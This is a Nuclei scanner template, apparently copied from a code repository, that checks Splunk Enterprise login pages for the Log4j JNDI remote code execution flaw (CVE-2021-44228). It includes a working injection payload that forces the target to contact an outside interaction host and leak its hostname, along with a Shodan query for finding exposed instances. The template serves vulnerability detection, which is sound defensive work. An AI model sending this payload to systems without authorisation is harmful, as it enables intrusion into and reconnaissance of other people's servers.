68 lines
2.5 KiB
YAML
68 lines
2.5 KiB
YAML
id: splunk-enterprise-log4j-rce
|
|
|
|
info:
|
|
name: Splunk Enterprise - Remote Code Execution (Apache Log4j)
|
|
author: shaikhyaser
|
|
severity: critical
|
|
description: |
|
|
Splunk Enterprise is susceptible to Log4j JNDI remote code execution. Splunk Enterprise enables you to search, analyze and visualize your data to quickly act on insights from across your technology landscape.
|
|
reference:
|
|
- https://www.splunk.com/en_us/blog/bulletins/splunk-security-advisory-for-apache-log4j-cve-2021-44228.html
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
|
cvss-score: 10
|
|
cve-id: CVE-2021-44228
|
|
cwe-id: CWE-77
|
|
metadata:
|
|
max-request: 1
|
|
shodan-query: http.title:"Login - Splunk"
|
|
tags: cve,cve2021,rce,jndi,log4j,splunk,oast,kev
|
|
variables:
|
|
rand1: '{{rand_int(111, 999)}}'
|
|
rand2: '{{rand_int(111, 999)}}'
|
|
str: "{{rand_base(5)}}"
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /en-US/account/login HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Accept: text/javascript, text/html, application/xml, text/xml, /
|
|
X-Requested-With: XMLHttpRequest
|
|
Origin: {{RootURL}}
|
|
Referer: {{RootURL}}
|
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
|
|
|
cval={{unix_time()}}&username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/{{str}}}&password={{str}}&return_to=%2Fen-US%2F
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: interactsh_protocol # Confirms the DNS Interaction
|
|
words:
|
|
- "dns"
|
|
|
|
- type: regex
|
|
part: interactsh_request
|
|
regex:
|
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
|
|
|
extractors:
|
|
- type: kval
|
|
kval:
|
|
- interactsh_ip # Print remote interaction IP in output
|
|
|
|
- type: regex
|
|
group: 2
|
|
regex:
|
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
|
|
part: interactsh_request
|
|
|
|
- type: regex
|
|
group: 1
|
|
regex:
|
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
|
part: interactsh_request
|
|
|
|
# digest: 4a0a0047304502210095048660d7955bb6d638079866906a63761596683420123ab6736b6b9af5da5102204dec9193b0a493d4459374b73955486366461ee5e48a9bafd81053d865f525fc:922c64590222798bb761d5b6d8e72950
|